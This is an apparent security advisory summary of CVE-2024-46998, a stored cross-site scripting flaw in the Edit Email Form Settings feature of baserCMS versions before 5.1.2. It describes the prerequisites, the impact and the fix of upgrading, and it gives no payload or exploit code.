baserCMS has a Cross-site Scripting (XSS) Vulnerability in Edit Email Form Settings Feature

Vulnerability

Overview

CVE-2024-46998 is a stored cross-site scripting vulnerability in the Edit Email Form Settings feature of baserCMS, a PHP and CakePHP-based website development framework. The vulnerability affects baserCMS 5 series versions prior to 5.1.2. According to the official advisory, the issue stems from improper handling of input data in the email form settings interface, enabling an attacker to store malicious scripts that execute when an administrator views the affected page [2].

Exploitation

Prerequisites

To exploit this vulnerability, an attacker must have authenticated access to the management screen. The advisory notes that this vulnerability only requires a response if the management screen is used by an unspecified number of users (e.g., multiple administrators or contributors) [2]. No additional privileges beyond those required to access the email form settings are necessary, making it particularly dangerous in environments with shared administrative access.

Impact

Successful exploitation could allow an attacker to execute arbitrary scripts in the browser of any user viewing the compromised email form settings page. This can lead to session hijacking, defacement, or theft of sensitive data handled within the admin context. The stored nature of the XSS means the malicious payload persists across sessions until manually removed [2].

Mitigation

The vendor has released baserCMS version 5.1.2 which fixes this vulnerability [1]. Users are strongly advised to update to this latest version. No workarounds are mentioned; the only recommended action is upgrading [2].